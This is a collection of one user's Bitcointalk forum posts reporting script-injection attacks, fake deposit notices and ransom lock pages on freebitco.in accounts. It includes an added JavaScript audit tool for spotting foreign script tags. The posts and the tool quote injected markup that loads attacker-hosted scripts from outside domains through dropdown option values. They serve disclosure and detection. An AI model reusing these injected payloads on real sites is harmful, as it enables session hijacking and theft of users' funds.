Bitcoin Forum
1  Economy / Gambling / Re: FreeBitco.in-$200 FreeBTC⭐Win Lambo🔥0.2BTC DailyJackpot🏆$32,500 Wager Contest on: August 28, 2024, 05:52:50 PM
Because of recent problems, I also decided to withdraw funds from my account.
Fortunately "slow method" worked fine and was processed in about 5h.

2  Economy / Scam Accusations / Re: [WARNING] Attack on freebitco.in account on: May 05, 2024, 01:26:33 PM
So it looks like the second wave of attacks has been completed.
The attackers' GitHub profile has been deleted and the malicious script removed from the CDN site.
I believe that again it was done by the attackers to cover their tracks.
No evidence, so nothing to prove.

It's only a matter of time before they strike again and the whole history comes full circle.
As long as the vulnerability is not patched the attacker can exploit it whenever he wants.
Of course, he should not exaggerate, so as not to draw too much attention.
A small group of high rollers will be attacked again, they will report an issue, but no one will believe it. They will be accused of spreading FUD/trolling etc., because other accounts will be working as usual.
Even after so many reports there are still users who are deeply convinced that the issue is on the client's side, that our machines got compromised/got malware... etc.
It just shows how effective this method is.
3  Economy / Scam Accusations / Re: [WARNING] Attack on freebitco.in account on: May 04, 2024, 10:51:43 PM
Except that I sent 2000€ to an address that has been changed, my account has been drained as well.

That's another 19300€ worth of bitcoin.

The reason I started a topic Bitcoin is hacked and they are well aware of it.
You can not tell me that after so many people mailed them or contacted them in other ways they are not informed.
Second, it's impossible to change the source code of a website; to change the intro page you must have access to the server, and since the server is protected by Cloudflare it is not that easy. Therefore there is no such thing as an injection of a wrong script; it's already loaded as soon as you go to the site.

Blocking the JavaScript results in not being able to log in or get the account address back.

I have an ugly feeling that we all got scammed by a website and address held on the Virgin Islands, and that those 2 boy scouts have nicely vanished with our money.

Of course I could be wrong, but from my point of view the attackers are able to put a link into a particular place on the fbc website.
And it's exactly:
FBC -> "REFER" tab -> "ADVANCED TRACKING USING TAGS" button -> "SELECT A TAG TO VIEW ITS STATS" and the link is hidden in the drop-down list.
It was not visible from the GUI, but it was somehow placed into the HTML code.

The link leads to a malicious script which is executed during website loading.
And because of it the website content can be modified.

Unaffected accounts don't have any links placed/injected into their session in that location.
Affected user i.e @Drazen2003:
    <div class="center bold" style="padding-bottom:10px;">SELECT A TAG TO VIEW ITS STATS</div>
    <center>
        <select id="get_tag_stats" style="width:275px;">
            <option value>--</option>
          <option value="<script src=https://cashtravel.info/forum/main.js></script>">
                <script src="https://cashtravel.info/forum/main.js"></script>
            </option>
            <option value="<script src=https://cdn.jsdelivr.net/gh/feleryunfbc/js/jquery.min.js></script>">
                <script src="https://cdn.jsdelivr.net/gh/feleryunfbc/js/jquery.min.js"></script>
            </option>

        </select>
 
Not affected user:
    <div class="center bold" style="padding-bottom:10px;">SELECT A TAG TO VIEW ITS STATS</div>
    <center>
        <select id="get_tag_stats" style="width:275px;">
            <option value>--</option>
        </select>
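
The manual check described in this post (looking in the page source for script links that do not belong there), written as a small audit over saved HTML. This is an added example, not part of the original post or of the site's code; the allowlist, the `/static/app.js` path and the function names are assumptions, and the sample markup is constructed from the two snippets quoted above.

```javascript
"use strict";

// Assumption: hosts the page is expected to load scripts from. Build the real
// list from the source of a session known to be clean.
const ALLOWED_HOSTS = ["freebitco.in"];
const PAGE_ORIGIN = "https://freebitco.in/"; // base for resolving relative src values

// <script ... src=...> with a double-quoted, single-quoted or unquoted value.
// Scanning the raw text also catches tags sitting inside an attribute value.
// Inline scripts without a src attribute are outside the scope of this check.
const SCRIPT_SRC = /<script\b[^>]*?\ssrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/gi;
const SELECT_BLOCK = /<select\b[^>]*>[\s\S]*?<\/select>/gi;

function hostAllowed(host) {
  return ALLOWED_HOSTS.some((h) => host === h || host.endsWith("." + h));
}

// Returns one finding per distinct script URL that is either off the allowlist
// or located inside a <select>, where no script reference belongs.
function auditScripts(html) {
  const selects = [...html.matchAll(SELECT_BLOCK)].map((m) => [m.index, m.index + m[0].length]);
  const findings = new Map();
  for (const m of html.matchAll(SCRIPT_SRC)) {
    const raw = m[1] ?? m[2] ?? m[3];
    let url;
    try {
      url = new URL(raw, PAGE_ORIGIN);
    } catch {
      continue; // not a parseable URL, nothing to classify
    }
    const inSelect = selects.some(([start, end]) => m.index >= start && m.index < end);
    const allowed = hostAllowed(url.hostname);
    if (allowed && !inSelect) continue; // expected script in an expected place
    if (!findings.has(url.href)) {
      findings.set(url.href, { src: url.href, host: url.hostname, inSelect, allowed });
    }
  }
  return [...findings.values()];
}

// Constructed sample: the "affected user" markup quoted in the post, plus one
// hypothetical first-party script (/static/app.js) for contrast.
const AFFECTED_SAMPLE = `
<script src="/static/app.js"></script>
<select id="get_tag_stats" style="width:275px;">
  <option value>--</option>
  <option value="<script src=https://cashtravel.info/forum/main.js></script>">
    <script src="https://cashtravel.info/forum/main.js"></script>
  </option>
  <option value="<script src=https://cdn.jsdelivr.net/gh/feleryunfbc/js/jquery.min.js></script>">
    <script src="https://cdn.jsdelivr.net/gh/feleryunfbc/js/jquery.min.js"></script>
  </option>
</select>`;

// Constructed sample: the "not affected user" markup quoted in the post.
const CLEAN_SAMPLE = `
<script src="/static/app.js"></script>
<select id="get_tag_stats" style="width:275px;">
  <option value>--</option>
</select>`;

console.log(auditScripts(AFFECTED_SAMPLE));
console.log(auditScripts(CLEAN_SAMPLE));
```

Each script URL is reported once, even though the quoted markup carries it both in the option's `value` attribute and in the option body.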
4  Economy / Gambling / Re: FreeBitco.in-$200 FreeBTC⭐Win Lambo🔥0.2BTC DailyJackpot🏆$32,500 Wager Contest on: May 04, 2024, 03:01:02 PM
I’m curious regarding out of many players on this casino why you guys experienced this kind of script attack. Maybe there’s something common with you guys that you are doing on your account.

It was already mentioned, but there is quite a mess in posts.
Only a small group of users were targeted - mainly high rollers.
So most of us are users whose IDs were published on the leaderboard of the daily jackpot, monthly wagering or referral contest.
5  Economy / Gambling / Re: FreeBitco.in-$200 FreeBTC⭐Win Lambo🔥0.2BTC DailyJackpot🏆$32,500 Wager Contest on: May 04, 2024, 02:46:33 PM
Oh, that's new!
@Drazen2003
Attackers in your case injected another script - it's under a new location and for sure the code is different.
The script source code is obfuscated, so it's not easy to decode.
We can try to deobfuscate it using https://deobfuscate.io/ but it's still not easy to understand.

Try to block this script https://cdn.jsdelivr.net/gh/feleryunfbc/js/jquery.min.js, delete cookies or clear your browser history, then log into fbc and check again.

My case was different - there was only 'cashtravel' script.
Link to my case if somebody missed it - https://bitcointalk.org/index.php?topic=5492456.0
6  Economy / Scam Accusations / Re: [WARNING] Attack on freebitco.in account on: May 04, 2024, 11:02:55 AM
Yes, but in my case it was different.
Please read point 1 from my first post in this topic.
My deposit address also changed, but after about 2 weeks it went back to normal.

I believe that this whole attack campaign started in the second half of March.
At that time I was reading the first posts about changes in deposit addresses.
My account was attacked in the first wave, but now when I read about new victims (second wave?) it looks like the attackers have much improved themselves.
Hijacking sessions, making unauthorized withdrawals and bypassing 2FA - it looks very serious.

Edit:
According to information shared by user @Drazen2003,
there is a completely new link injected into his session.
The new link leads to a new malicious script:
https://cdn.jsdelivr.net/gh/feleryunfbc/js/jquery.min.js

I did some investigation and it looks like the second wave of attacks started about 23rd April.
That day the attacker created his account on GitHub and placed the new malicious script there.
After that he published it on the CDN site.
Attacker profiles:
https://github.com/feleryunfbc
https://www.jsdelivr.com/package/gh/feleryunfbc/js?tab=files
 
7  Economy / Scam Accusations / Re: [WARNING] Attack on freebitco.in account on: May 04, 2024, 10:27:12 AM
No, nothing.
Yesterday the link was still there.
When claiming free rolls/WoFs I was always checking if it's still there.
I guess things are slowly getting sorted.
Pity that there is absolutely no communication from fbc to the community.
8  Economy / Scam Accusations / Re: [WARNING] Attack on freebitco.in account on: May 04, 2024, 09:56:06 AM
Link to malicious script disappeared today from my user session.
It is no longer visible in website's html code.

Today:


Before:
9  Economy / Scam Accusations / Re: [WARNING] Attack on freebitco.in account on: May 02, 2024, 10:17:45 PM
I believe that only a small group of high rollers were targeted, or at least users whose IDs were published on the leaderboard of the daily jackpot, monthly wagering or referral contest.
I believe the vulnerability can't be exploited without a valid user ID and the attackers are definitely getting those IDs from the jackpot leader board. This explains why only a limited number of users were affected by this attack.
If the freebitco.in team are aware of this and didn't take any action, that's bad. If they aren't, that's even worse!

Hard to say, maybe in your case, at some point attackers managed to overwrite deposit address and make it fixed somewhere in website's html code.
The difference between your case and his is that he made a deposit while you didn't. Since you didn't make a deposit, the attacker probably decided to change his tactic by making you believe your account got banned.

Sure, but by "valid ID" they just need any ID of an active user with some balance.
On the fbc platform the user ID is just an ordinal number defining when the user registered.
So it can be any number from 1 to number_of_all_users (i.e. the famous site creator - wetsuit - has ID=4, according to his referral link).
I think attackers can hijack any user session, but by doing it they would attract too much attention.
Lots of accounts are deleted, abandoned, inactive or with too low a balance to do anything.
So for these obvious reasons there is no point in attacking them all.
The attackers chose only a small group of active accounts and that works.

I created account here to share info about it and warn you.
From the very beginning, because of newbie rank I was accused of being troll, spreading fud etc. - that was never my intention.
I'm aware that vast majority of fbc accounts are clean and not affected - sure, but for how long...
Just be careful guys.
10  Economy / Scam Accusations / Re: [WARNING] Attack on freebitco.in account on: May 02, 2024, 07:09:28 PM
Hard to say, maybe in your case, at some point attackers managed to overwrite deposit address and make it fixed somewhere in website's html code.
They had customized scripts, so every case can be different.
And since fbc is not quick to act, attackers had time to adapt and improve their scripts or even improve the whole attack scenario.

I sent email about 2 weeks ago, but still waiting for response.
11  Economy / Scam Accusations / Re: [WARNING] Attack on freebitco.in account on: May 02, 2024, 06:24:37 PM
Yeah, I believe that only a small group of high rollers were targeted, or at least users whose IDs were published on the leaderboard of the daily jackpot, monthly wagering or referral contest.
And that's understandable - these accounts have active users and should have enough BTC balance to make a withdrawal.

Attackers managed to inject a malicious script into a particular user's session (by a known ID).
In my case it was https://cashtravel.info/forum/main.js.
Now, attackers could change the location of the malicious script and even improve its code.

I saw that one of the Legendary users became a victim of a similar attack, so maybe now this issue will get proper attention.
12  Economy / Scam Accusations / Re: [WARNING] Attack on freebitco.in account on: April 12, 2024, 04:59:14 PM
Did you contact the freebitco.in support team to inform them about this? You should do this ASAP so they can investigate what happened and fix the problem in case there is a vulnerability in their website.
Based on the information you shared it's unlikely that your device or network are compromised since there are other victims and the hacker is targeting high rollers, so all he has is their IDs.

No, at least not yet.
I think I don't have enough evidence to prove anything.


It looks like you're not the only one who has experienced this since March; some of its users complained too on their ANN thread[1], you can make a post there too linking this thread. But as long as there's no response from TheQuin, this will not be cleared. Maybe this is just a technical issue of not reflecting the new address's balance or what, lastly the site might be hacked that way, I hope it's not though. But for the meantime, what you need to do is to wait and don't try to deposit again on the site.

[1] https://bitcointalk.org/index.php?topic=319540.9100

Yeah, since my account could be compromised I will definitely not deposit anything there soon.
I have changed my password, but still have some security concerns.
For sure the attacker can't withdraw anything because of 2FA.
If he managed to hijack my session he can harm me by using my balance to gamble and lose it on purpose.
I was able to withdraw all my BTC funds, but there is still quite a big bag of Fun Tokens left.
For now they are locked; I will try to reach them when the FUN savings mature.
13  Economy / Gambling / Re: FreeBitco.in-$200 FreeBTC⭐Win Lambo🔥0.2BTC DailyJackpot🏆$32,500 Wager Contest on: April 11, 2024, 07:55:04 PM
As mentioned some posts earlier, I have started a new topic about recent attack attempts on my fbc account.
https://bitcointalk.org/index.php?topic=5492456.0

You can find there my side of the story.

tldr:
I just wanted to inform you about these incidents. Be careful and protect your funds.
Someday it can also happen to you and to any service on the Internet.
14  Economy / Scam Accusations / [WARNING] Attack on freebitco.in account on: April 11, 2024, 05:45:09 PM
Hi,
I would like to share my recent experience using freebitco.in.
There were some attack attempts on my account.
I have been using fbc for years and I've never had any serious problems with the platform.

So, to the point.
I have faced two issues. The first one started about a week ago.

1. Fake notification about change of deposit address.
There was a notification placed on the main page and looked exactly like any other notification on fbc.
You know, yellow rectangle in a frame.
Same colors, same fonts i.e:


There was information about a change in the deposit address - something more or less like "Please note that your deposit address have been change to segwit P2SH format. Depositing to your old address will be charged of additional fee."
After clicking the Deposit button there was indeed a new bitcoin address starting with the digit '3...'
It looked very convincing, but I ignored this notification because I didn't plan to make any deposit soon.

I found at least three other users on this forum who faced the same issue:
Below you can find some other user's screenshot - I have just marked parts of this false notification. It's only partially visible in the background.


According to messages from these users, they actually deposited some funds to the new addresses but they were never credited to their fbc accounts (they even posted their User IDs, TX hashes etc.).

Like I said before, I did not pay much attention to it because I didn't plan to make a deposit, but this notification was somehow added/injected into the website's HTML code.
The notification looked very convincing but I just wasn't interested in it.
I simply ignored it and I was using fbc as usual.
Besides this notification everything looked and worked as always.
As usual I was claiming free rolls, WoFs, free spins from emails, playing Hi-Lo etc.

After a few days, this notification disappeared and the deposit address came back to the previous one - legacy format starting with '1...'
My thoughts were that they just performed a rollback of this change and that's all.

On 9th April I faced the second issue.

2. XSS attack?

During another session in the Hi-Lo game my account was suddenly locked.
Instead of fbc website there was a blank page with a message:
"Your account is locked. Please contact @hallohap_1 on telegram or fellowyun@proton.me email. Failure to comply will result to a lost of funds"

I was quite shocked.
I have only one account, I was never using any VPNs or bots.
As usual I was just using built-in feature "auto-bet" and that's all.

I sent a message to fellowyun@proton.me asking what happened.

After a few hits of the refresh button in my browser the block page changed to:
"Your account is locked. Please contact @hallohap_1 on telegram or bellera12@proton.me email. Failure to comply will result to a lost of funds"


So, I sent the same message to the new e-mail address.
Then a typical ransom scheme started. At this point I didn't know how the attacker achieved it, so for me the threat was real.
I got a response:
"Your browser is hacked. Send 0.5 btc to bc1qhrdvuxrealra5xm7qsu9tyh06k3frcrzuvsms7 to unlock it. Why trust me? I cant withdraw your money because it needs otp and email. Ill wait 1hr before I drain it"

I knew that sending 0,5 btc is pointless so I started to investigate this attack.
After some time I got another message from the attacker that I'm running out of time.
I tried to gain some time for myself by tricking him.


I wiped my entire browser history, tried on a different browser in private/incognito mode, I changed the device to a clean PC with a different operating system, I even changed DNS servers - everything was exactly the same - a blank page with the message about a locked account.
And this all happened with 2FA enabled.
Then I started checking logs. In the developer tools built into the browser I saw entries about the loading of a strange JS script under https://cashtravel.info/forum/main.js. I blocked it with the "NoScript!" browser plugin, and after that the fbc page was unlocked.
Extremely stressed, not thinking much, I went straight to the Withdraw button and chose the Instant Method.
At that point I didn't know how the attacker performed this scam, so I was afraid that he would replace the withdrawal address on the fly or hijack the OTP - but I had no options.
Fortunately I was able to withdraw all my BTC funds.
The Instant method worked out well and after ~30min I had all my funds confirmed and stored in my wallet.

How did it happen?
I'm not sure.
I have 2FA enabled, I used a clean device and the issue was still visible. My fbc account email is used only for fbc purposes, so there was no chance for any phishing attacks.
I also don't believe that the attacker actually compromised my entire network or all the devices I have. For me it's impossible, or at least it would cost too much effort.

From my point of view the attacker found some vulnerability in fbc or a 3rd party service they use and managed to exploit it.
I suppose that the attacker somehow injected a link to an external source with a malicious script.
In the source code of this malicious script there were hardcoded user IDs. He managed to hijack sessions from specific users.

Why and how was I attacked?
I believe that the attacker was targeting high rollers and taking user IDs from the wagering leaderboard.
For a few days in a row my user ID was shown in the top 10 of the wagering contest.

It's hard to prove anything now.
At some point the script was changed and removed.
The source of one version of this script can be found under https://pastebin.ai/eo0q78pbuj
This particular script was prepared to attack the user with ID 31898443 who won the daily jackpot on 2024-04-08.

At present there is no script at https://cashtravel.info/forum/main.js
I believe that the attacker deleted it to cover his tracks.

On my account I still have the injected link to the malicious script.
I have blocked it from executing but it's still present in the HTML code.
15  Economy / Gambling / Re: FreeBitco.in-$200 FreeBTC⭐Win Lambo🔥0.2BTC DailyJackpot🏆$32,500 Wager Contest on: April 11, 2024, 12:46:57 PM
Everything was looking legitimate. This message was looking exactly the same as any other notification on fbc site. Same fonts, same colors, etc.

Now everything works as usual, so I guess I will never know what happened.
It doesn't look legitimate when you see such a message and someone asks you to contact them on their protonmail email. I know that Protonmail is used for privacy purposes but no company should write you or contact you with Proton email because they are LTD, they have responsibilities and they shouldn't be the one protecting their privacy on that level. Company should be public, open and should be using their own email servers instead of Proton.
So, asking for deposit and contacting on telegram or protonmail was already a red flag.

By the way, I don't understand what happened exactly, was that problem on your router? Or were all of your computers infected? Or was it actually the problem from Freebitco's side?

Ok, so since you actually asked, I will start a new topic about it and try to explain the whole situation again.

I also think that it's not the right place to continue this story.
If somebody is interested in it and has any questions you can always ask me there.
Just give me some time to gather things and describe the whole story from the beginning.

Like I said before, I have registered account here mainly to show what I faced.
Fortunately, I was not fooled, but the matter looked serious.
16  Economy / Gambling / Re: FreeBitco.in-$200 FreeBTC⭐Win Lambo🔥0.2BTC DailyJackpot🏆$32,500 Wager Contest on: April 10, 2024, 08:06:11 PM
What a shit show this is? A person who claims he used a loophole in a site to steal money from other users... and users who ask the thief to return the money.

@FelErYun Show us a screencast of this exploit. Otherwise I say fake. And the reports you sent, why not publish them here (without the details) or on forum thread. FBC will quickly see it.

I think they are all fake... Except for a bunch of words, I didn't see any screenshots, transactions, or any kind of evidence that would back up their stories. There's a scam accusation section, if some members think they have been cheated/scammed in any way they can open a topic there and attach all the evidence they have. Without proof, no one will believe these claims.


To sum up, there were two attack attempts: the first was the injection of a fake notification that the fbc deposit address had changed, and the second was a defaced website containing a message about a locked account and an attempt to get a ransom for unlocking it.

If you are really interested in this case just try to read my posts and my conversation with other users.
I registered an account here mainly to show the issue I faced.
Luckily I avoided being scammed and I think I described my side of the story quite well.
In my posts you can find a lot of screenshots including the defaced website, emails from scammers, proof of the injected malicious script etc.
Some posts above you can even find the source code of the script used to attack some other user.
I didn't deposit any funds to scammers, but other users actually posted messages with all the information you mentioned (TX hash, deposit addresses, User IDs) - but this is in another topic about fbc - https://bitcointalk.org/index.php?topic=319540.9100

17  Economy / Gambling / Re: FreeBitco.in-$200 FreeBTC⭐Win Lambo🔥0.2BTC DailyJackpot🏆$32,500 Wager Contest on: April 10, 2024, 11:36:27 AM
I checked this on different clean device which was never used for fbc (different OS, different browser, different DNS servers) and still my session was somehow hijacked.
It's also possible that my router is compromised but it's highly unlikely.
From my point of view... I know it's hard to believe and even I have doubts, but it looks like fbc had some security breach, or some 3rd party service they were using. Attackers were targeting only some small group of users (including me) and they managed to inject a malicious script only for some accounts.
For a week or so I was also getting notifications about a change in deposit address (change to P2SH segwit addresses starting with 3...), but I ignored that because I didn't plan to make deposits.
Everything was looking legitimate. This message was looking exactly the same as any other notification on fbc site. Same fonts, same colors, etc.

Now everything works as usual, so I guess I will never know what happened.

I don't know much about this kinda thing but from what I know about friends in IT, we have a lot of customers who send us client emails like this, it's always clients.

Server side issues usually very difficult to target specific clients from server, and I'm a user like you, very active, very old, and using a lot of features to earn interest etc. I never once got this kind of issue.

I did however get funds withdrawn a few years ago (and somehow never got the confirmation email) but since I did 2FA, nothing ever happened.

If you are using a new device and everything works as usual... it kinda confirms the theory your device/software got infected. Glad your funds are safe mate!

@FelErYun Show us a screencast of this exploit. Otherwise I say fake. And the reports you sent, why not publish them here (without the details) or on forum thread. FBC will quickly see it.

No, it started to work when I blocked the malicious script injected into my account session.
It also worked when I unblocked the script, but its code was already changed to target another user.
No matter on what device/software. I also had 2FA enabled.

He stole a whole $250 AUD from me. Well played sir, I didn't pick this up as I was doing it on my mobile, if I was on my pc I would've been safe.

I reported the cash website link to GoDaddy, so they removed the malicious JS quite quickly.



At present the script is removed from the external source, but it could also have been done by the attacker himself just to cover his tracks.
For now his method is burnt, but he can try again once the dust has settled.
New script, new link to malware etc.
When logged in, I still have the link to the malicious script side-loaded into the HTML source of the main fbc page.
It's blocked from executing, but it's still there.

Be careful guys.
Customer service is almost impossible to reach, so if you end up with an issue, you're mostly on your own.
We don't know the real scale of this attack, because the majority of fbc users don't even know about the existence of this forum.
18  Economy / Gambling / Re: FreeBitco.in-$200 FreeBTC⭐Win Lambo🔥0.2BTC DailyJackpot🏆$32,500 Wager Contest on: April 09, 2024, 09:47:34 PM
Seems they are targeting the winners of the multiply btc list, which I am on...

I've just blocked the malicious script with adblock; add this to your block list: https://cashtravel.info/forum/main.js

We need to figure out what's injecting that script into the freebitco.in website's HTML. It doesn't seem to be coming from their end, based on what I can see. My HTML source code is clean and free of any suspicious js calls from cashtravel(dot)info domain.


As far as I can see, the malicious code is added to the main site document named "?op=home"

Below are some screenshots of how it looks on my side.




Edit:
And also in default index document.
19  Economy / Gambling / Re: FreeBitco.in-$200 FreeBTC⭐Win Lambo🔥0.2BTC DailyJackpot🏆$32,500 Wager Contest on: April 09, 2024, 04:13:54 PM
When the issue was visible I saw that the fbc page was loading and after a short period of time it was getting covered by some kind of block page.
Like the message about the locked account is in the foreground and the normal fbc webpage is in the background. I tried to block it by adding a filter to the "ublock" plugin but without success.
Then I tried to check network logs in the developer tools built into the browser.
I also saw this suspicious url bitwrecked.
 
Unfortunately I didn't take any useful screenshots or save any logs.
I know that now it's impossible to prove anything.

At some point when I had these two scripts blocked it started to work


But now, even with these two scripts allowed to run, the page is loading successfully without any concerns.
It looks and works as usual.

Seems they are targeting the winners of the multiply btc list, which I am on...
I was in the top 10 daily jackpot leaderboards for a few days in a row. It could be it.


It just stops auto-roll when you hit 98>= satoshi profit during your rolling session.
To get the bonus balance transferred to your "main balance" you have to wager a specific amount of BTC.

In the script it's got a user ID of 31898443, who won yesterday's, to lock their account. @zibi it's the cash travel script that's doing it.

Oh, that's a very interesting finding.
My account has a different ID, but I believe that the scammers changed the script a few hours ago to attack another active user.
20  Economy / Gambling / Re: FreeBitco.in-$200 FreeBTC⭐Win Lambo🔥0.2BTC DailyJackpot🏆$32,500 Wager Contest on: April 09, 2024, 04:01:44 PM
When the issue was visible I saw that the fbc page was loading and after a short period of time it was getting covered by some kind of block page.
Like the message about the locked account is in the foreground and the normal fbc webpage is in the background. I tried to block it by adding a filter to the "ublock" plugin but without success.
Then I tried to check network logs in the developer tools built into the browser.
I also saw this suspicious url bitwrecked.
 
Unfortunately I didn't take any useful screenshots or save any logs.
I know that now it's impossible to prove anything.

At some point when I had these two scripts blocked it started to work


But now, even with these two scripts allowed to run, the page is loading successfully without any concerns.
It looks and works as usual.

Seems they are targeting the winners of the multiply btc list, which I am on...
I was in the top 10 daily jackpot leaderboards for a few days in a row. It could be it.


It just stops auto-roll when you hit 98>= satoshi profit during your rolling session.
To get the bonus balance transferred to your "main balance" you have to wager a specific amount of BTC.